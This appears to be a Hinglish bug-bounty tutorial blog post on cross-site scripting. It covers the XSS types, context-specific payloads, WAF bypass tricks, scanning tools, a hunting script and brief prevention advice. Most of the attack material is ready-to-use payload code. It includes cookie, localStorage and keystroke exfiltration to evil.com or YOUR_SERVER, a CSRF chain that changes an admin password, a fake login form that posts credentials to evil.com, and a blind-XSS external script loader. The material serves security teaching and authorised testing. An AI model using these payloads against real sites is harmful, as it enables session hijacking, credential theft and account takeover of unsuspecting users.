Aaj Kya Seekhenge?
- XSS kya hai bilkul basics se
- Teen types Reflected, Stored, DOM-Based
- Context-based bypasses elite technique
- WAF bypass techniques advanced
- Real payloads working 2026 mein
- Automated + Manual testing
- Bug bounty impact maximize karna
Kyun zaroori hai? XSS OWASP Top 10 mein hamesha rehta hai sabse common web vulnerability! Ek simple <script>alert(1)</script> se lekar account takeover, session hijacking, malware delivery tak β XSS ka impact bahut bada ho sakta hai!
XSS Kya Hai? Simple Analogy
Socho ek Notice Board hai school mein:
Normal Student:
β "Aaj cricket match hai" likhta hai
β Sab padhte hain β safe!
Evil Student (Attacker):
β "Agar yeh padhoge toh tumhara
wallet mujhe de do" likhta hai
β Sab padhte hain β Wallet dete hain! π±Website mein bhi yahi hota hai:
Normal User:
β Comment: "Bahut acha article hai!"
β Website display karta hai β safe!
Attacker:
β Comment: <script>steal_cookies()</script>
β Website execute karta hai!
β Har visitor ka cookie steal! π΄XSS = Malicious JavaScript inject karna aur victim ke browser mein execute karwana!
XSS Ke Teen Types
Type 1: Reflected XSS Mirror Attack
Flow:
1. Attacker β Malicious link banata hai:
https://target.com/search?q=<script>alert(1)</script>
2. Victim β Link click karta hai
3. Server β q parameter directly response mein reflect karta hai
4. Browser β Script execute karta hai!
"Reflect" = Server ne input wapas mirror kiya
bina sanitize kiye!Real Example:
Request:
GET /search?q=<script>alert(document.cookie)</script>
Response:
<h1>Search results for:
<script>alert(document.cookie)</script>
</h1>Type 2: Stored XSS Persistent Attack (HIGHEST IMPACT!)
Flow:
1. Attacker β Malicious payload DATABASE mein store karta hai
(Comment, Profile name, Message, etc.)
2. Payload β Server pe permanently save ho jaata hai
3. Har visitor β Payload trigger hota hai automatically!
"Stored" = Ek baar inject karo β
Hazaron users affect!Real Example:
Attacker ne comment section mein dala:
<script>
new Image().src='https://evil.com/steal?c='+document.cookie;
</script>
β Har user jo yeh page open kare
β Unka cookie attacker ke server pe jayega!
β Admin bhi open kare β Admin session steal!Type 3: DOM-Based XSS Client Side Attack
Flow:
1. Server response safe hoti hai
2. JavaScript khud DOM manipulate karta hai
3. User input directly DOM mein jaata hai β unsafe!
Server ko pata bhi nahi chalta!
Scanner bhi miss karte hain!Real Example:
// Vulnerable JavaScript code:
var search = location.hash.substring(1);
document.getElementById('output').innerHTML = search;
// Attack URL:
https://target.com/page#<img src=x onerror=alert(1)>
// Server ne kuch nahi kiya β browser ne khud inject kiya!PART 2: XSS Contexts Yeh Samjho Warna Payloads Kaam Nahi Karenge!
Context = Input kahan reflect ho raha hai HTML mein? Attribute mein? JavaScript mein?
Context 1: HTML Body Context
<!-- Input yahan reflect hota hai: -->
<p>Hello, USER_INPUT_HERE</p>
<!-- Basic payload: -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>Context 2: HTML Attribute Context
<!-- Input attribute mein reflect hota hai: -->
<input value="USER_INPUT_HERE">
<!-- Pehle attribute close karo: -->
"><script>alert(1)</script>
" onmouseover="alert(1)
" autofocus onfocus="alert(1)Context 3: JavaScript String Context
// Input JS string mein reflect hota hai:
var name = 'USER_INPUT_HERE';
// String se niklo:
';alert(1);//
\';alert(1);//
</script><script>alert(1)</script>Context 4: JavaScript Template Literal
// Modern JS template literal:
var msg = `Hello ${USER_INPUT}`;
// Payload:
${alert(1)}Context 5: URL/href Context
<a href="USER_INPUT">Click</a>
<!-- Payloads: -->
javascript:alert(1)
data:text/html,<script>alert(1)</script>PART 3: WAF Bypass Techniques Elite Level
Bypass 1: Case Variation
// Blocked: <script>
// Bypass:
<SCRIPT>alert(1)</SCRIPT>
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</sCrIpT>Bypass 2: Event Handlers No script tag!
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<svg onload=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<video src=x onloadstart=alert(1)>
<audio src=x onloadstart=alert(1)>Bypass 3: Encoding Tricks
// HTML Entity Encoding
<script>alert(1)</script>
<script>alert(1)</script>
// URL Encoding
%3Cscript%3Ealert(1)%3C/script%3E
// Double URL Encoding
%253Cscript%253E
// Unicode
\u003cscript\u003e
// Hex
\x3cscript\x3eBypass 4: Filter Evasion
// "script" word blocked?
<scr<script>ipt>alert(1)</scr</script>ipt>
<scr\x00ipt>alert(1)</scr\x00ipt>
// "alert" blocked?
alert`1`
confirm(1)
prompt(1)
eval('ale'+'rt(1)')
(alert)(1)
a=alert,a(1)
top['ale'+'rt'](1)
window['alert'](1)Bypass 5: Parenthesis-Free Payloads
// Jab () block hain:
alert`1`
throw/*//<img/src=x onerror=alert(1)>
{onerror=alert}throw 1Bypass 6: JavaScript Protocol
// href ya src mein:
javascript:alert(1)
javascript:alert(document.domain)
JaVaScRiPt:alert(1)
java	script:alert(1)
java
script:alert(1)Bypass 7: SVG Vectors
// SVG = Most powerful XSS vector!
<svg><script>alert(1)</script></svg>
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=alert(1)>
<svg onload="alert(1)">PART 4: Impact Maximize Karo Bounty Badhao!
alert(1) se bounty nahi milti IMPACT se milti hai!
Impact 1: Cookie Stealing Account Takeover
// Basic cookie steal
<script>
document.location='https://YOUR_SERVER/steal?c='+document.cookie
</script>
// Image tag se (stealthier)
<img src=x onerror="this.src='https://YOUR_SERVER/c?='+document.cookie">
// XHR se
<script>
var x = new XMLHttpRequest();
x.open('GET','https://YOUR_SERVER/?c='+btoa(document.cookie));
x.send();
</script>Impact 2: Session Hijacking
// LocalStorage bhi steal karo
<script>
fetch('https://YOUR_SERVER/?data='+btoa(
JSON.stringify({
cookies: document.cookie,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage),
url: location.href
})
));
</script>Impact 3: Keylogger
// Victim jo type kare β sab record!
<script>
document.addEventListener('keyup', function(e){
fetch('https://YOUR_SERVER/?k='+btoa(e.key));
});
</script>Impact 4: CSRF + XSS Combo Account Takeover Chain!
// Admin ki cookies se admin actions karo
<script>
// Step 1: Admin ka CSRF token lo
fetch('/admin/settings')
.then(r=>r.text())
.then(html=>{
var token = html.match(/csrf_token.*?value="(.*?)"/)[1];
// Step 2: Token use karke password change karo
fetch('/admin/change-password',{
method:'POST',
body:'new_password=hacked123&csrf_token='+token,
headers:{'Content-Type':'application/x-www-form-urlencoded'}
});
});
</script>Impact 5: DOM Manipulation Phishing
// Login form replace karo fake se!
<script>
document.body.innerHTML = `
<form action="https://evil.com/steal" method="POST">
<h2>Session Expired β Please Login Again</h2>
<input name="user" placeholder="Username">
<input name="pass" type="password" placeholder="Password">
<button>Login</button>
</form>`;
</script>PART 5: Kahan Dhundhen XSS? Input Points
π SEARCH BARS β q=, search=, query=
π COMMENT SECTIONS β Stored XSS most likely!
π€ PROFILE FIELDS β Name, Bio, Website
π§ EMAIL FIELDS β Kabhi kabhi reflect hote hain
π© CONTACT FORMS β Admin ko email jaata hai
π URL PARAMETERS β ?name=, ?msg=, ?error=
πͺ COOKIES β Cookie values reflect?
π HTTP HEADERS β User-Agent, Referer, X-Forwarded-For
π REDIRECT PARAMS β ?next=, ?url=, ?redirect=
π FILE UPLOADS β SVG files mein XSS!
βοΈ JSON RESPONSES β API responses mein injectionPART 6: Automated XSS Testing
Tool 1: Dalfox Best XSS Scanner
# Install karo
go install github.com/hahwul/dalfox/v2@latest
# Single URL
dalfox url "https://target.com/search?q=test"
# File se URLs
dalfox file xss_candidates.txt
# Pipeline se
cat gau_urls.txt | gf xss | dalfox pipe \
--silence \
--no-color \
-o xss_found.txt
# Custom payload ke saath
dalfox url "https://target.com/?q=test" \
--custom-payload payloads.txtTool 2: XSSHunter Blind XSS Ke Liye
# xsshunter.com pe account banao (free)
# Tumhara payload milega:
# "><script src=https://yoursubdomain.xss.ht></script>
# Har input field mein yeh dalo
# Admin panel mein ya email mein reflect hua toh
# Callback aayega tumhare dashboard pe!
# Blind XSS = $500-$2000 bounty!Tool 3: Burp Suite Manual Testing
# Burp Suite Intruder se
1. Request intercept karo
2. Parameter pe right click β Send to Intruder
3. Payload position mark karo
4. XSS payloads list load karo
5. Attack start karo
6. Response mein unescaped payloads dhundhoPART 7: SVG File Upload XSS Advanced
<!-- malicious.svg banao -->
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
<!-- Upload karo profile picture ke jagah -->
<!-- Agar SVG serve ho directly β XSS! -->PART 8: XSS Prevention Reporter Ki Nazar Se
Report mein yeh likhna impact badhata hai!
Vulnerable Code:
echo "<p>Hello, " . $_GET['name'] . "</p>";
Fixed Code:
echo "<p>Hello, " . htmlspecialchars($_GET['name'],
ENT_QUOTES, 'UTF-8') . "</p>";
Prevention Methods:
1. Output Encoding (htmlspecialchars)
2. Content Security Policy (CSP) headers
3. HttpOnly cookie flag
4. Input validation
5. Framework built-in escapingElite XSS Hunting Workflow
#!/bin/bash
# xss_hunt.sh
TARGET=$1
DIR="xss_${TARGET}"
mkdir -p $DIR
echo "π XSS Hunt: $TARGET"
# Step 1: URLs collect karo
gau $TARGET | grep "?" | \
grep -vE "\.(png|jpg|css|js|gif)" | \
uro > $DIR/urls.txt
# Step 2: XSS candidates filter
cat $DIR/urls.txt | gf xss > $DIR/xss_cands.txt
echo "β
XSS Candidates: $(wc -l < $DIR/xss_cands.txt)"
# Step 3: Dalfox se scan
cat $DIR/xss_cands.txt | \
dalfox pipe \
--silence \
--no-color \
--follow-redirects \
-o $DIR/xss_found.txt 2>/dev/null
echo "π₯ XSS Found: $(wc -l < $DIR/xss_found.txt)"
# Step 4: Manual testing ke liye interesting params
cat $DIR/xss_cands.txt | grep -iE \
"search|query|q=|name|msg|message|
error|alert|redirect|next" \
> $DIR/manual_test.txt
echo "π― Manual targets: $(wc -l < $DIR/manual_test.txt)"
echo "Results in: $DIR/"XSS Payloads Cheat Sheet
// βββ BASIC ββββββββββββββββββββββββββββββββ
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
// βββ ATTRIBUTE CONTEXT ββββββββββββββββββββ
"><script>alert(1)</script>
" onmouseover="alert(1)
" autofocus onfocus="alert(1)
// βββ JS CONTEXT βββββββββββββββββββββββββββ
';alert(1);//
\';alert(1);//
// βββ FILTER BYPASS ββββββββββββββββββββββββ
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror=alert`1`>
alert`1`
(alert)(1)
top['ale'+'rt'](1)
// βββ HIGH IMPACT ββββββββββββββββββββββββββ
<script>document.location='https://evil.com/?c='+document.cookie</script>
<img src=x onerror="fetch('https://evil.com/?c='+btoa(document.cookie))">
// βββ BLIND XSS ββββββββββββββββββββββββββββ
"><script src=https://yoursubdomain.xss.ht></script>Aaj Ka Homework
1. DVWA (Damn Vulnerable Web App) setup karo:
docker run -d -p 80:80 vulnerables/web-dvwa
2. XSS section mein teen levels complete karo:
β Low: Basic <script>alert(1)</script>
β Medium: Filter bypass karo
β High: WAF bypass technique use karo
3. DOM XSS test karo:
https://xss-game.appspot.com/
(Google ka free XSS practice game!)
4. Dalfox install karo aur test karo:
dalfox url "http://testphp.vulnweb.com/search.php?test=1"Quick Revision
π XSS = Malicious JS inject karna
π‘ Reflected = URL parameter β Response mein
πΎ Stored = Database mein β Sab pe affect
π DOM-Based = JS khud manipulate karta hai
π― Context = HTML / Attribute / JS β alag payloads!
π‘οΈ WAF Bypass = Encoding, Event handlers, Case variation
π° Impact = Cookie steal > alert(1)!
π€ Tools = Dalfox, XSSHunter, Burp SuiteMeri Baatβ¦
Pehli baar jab mujhe XSS mili sirf alert(1) tha!
Maine report bheja company ne kaha:
"Self-XSS β Not Applicable"
Samjha nahi tab lekin seekha ki impact prove karna zaroori hai!
Doosri baar same type ki XSS mili lekin is baar:
<script>
document.location='https://MY_SERVER/?c='+document.cookie
</script>Screenshot liya cookie actually steal hua admin cookie!
Bounty: $750 Medium! π
Lesson: alert(1) PoC nahi hai real impact dikhao!
Agle article mein SQL Injection database ke andar ghusna, data nikalna, aur kabhi kabhi complete server takeover! π₯
HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #13 Nuclei Grand Finale Next: Article #15 SQL Injection: Database Ko Hack Karo!
#XSS #CrossSiteScripting #BugBounty #WebSecurity #EthicalHacking #Hinglish #OWASP #HackerMD